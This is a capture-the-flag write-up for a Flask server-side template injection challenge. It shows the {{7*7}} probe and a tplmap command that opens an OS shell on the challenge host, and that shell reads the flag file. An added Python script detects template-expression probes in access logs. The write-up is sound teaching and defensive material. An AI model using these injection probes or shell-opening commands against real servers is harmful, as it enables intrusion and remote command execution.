There were some base64-encoded comments in the HTML source code. One of the comments leads to: http://104.154.106.182:5050/?secret=flag

If you look at the HTML source of that page, it contains the string "flag", so the value of the secret parameter is reflected. So what about:

http://104.154.106.182:5050/?secret={{7*7}}

Then there is "49" in the source, which means the expression was evaluated on the server, so it is Flask template injection. tplmap can be used against it: https://github.com/epinna/tplmap


python tplmap.py -u http://104.154.106.182:5050/?secret=flag --os-shell

...
[+] Run commands on the operating system.
posix-linux $ ls
application.py flag.txt requirements.txt static templates
posix-linux $ cat flag.txt
encryptCTF{!nj3c7!0n5_4r3_b4D}
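
From the defender's side, the {{7*7}} probe used above shows up in the web server's access log. The following is an added example, not part of the original writeup: it scans constructed log lines for template expressions in query parameters, including URL-encoded and double-encoded forms. The log format, the client addresses and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2019:10:00:01 +0000] "GET /?secret=flag HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2019:10:00:09 +0000] "GET /?secret={{7*7}} HTTP/1.1" 200 510
198.51.100.7 - - [01/Jan/2019:10:00:15 +0000] "GET /?secret=%7B%7B7*7%7D%7D HTTP/1.1" 200 510
198.51.100.7 - - [01/Jan/2019:10:00:21 +0000] "GET /?secret=%257B%257B7*7%257D%257D HTTP/1.1" 200 510
203.0.113.9 - - [01/Jan/2019:10:01:00 +0000] "GET /static/style.css?v=2 HTTP/1.1" 200 900
"""

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Expression delimiters used by common template engines: {{ }}, {% %}, ${ }, <% %>.
TEMPLATE_RE = re.compile(r'\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%.*?%>')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded probes are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_probes(log_text):
    """Return (client, parameter, decoded value) for each suspicious query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target = m.groups()
        query = urlsplit(target).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            if TEMPLATE_RE.search(value):
                hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    for client, name, value in find_probes(SAMPLE_LOG):
        print(f"{client} sent template expression in '{name}': {value}")
```

A hit only shows that someone probed; whether the application is affected depends on whether request data is placed into the template source itself instead of being passed to the template as a variable.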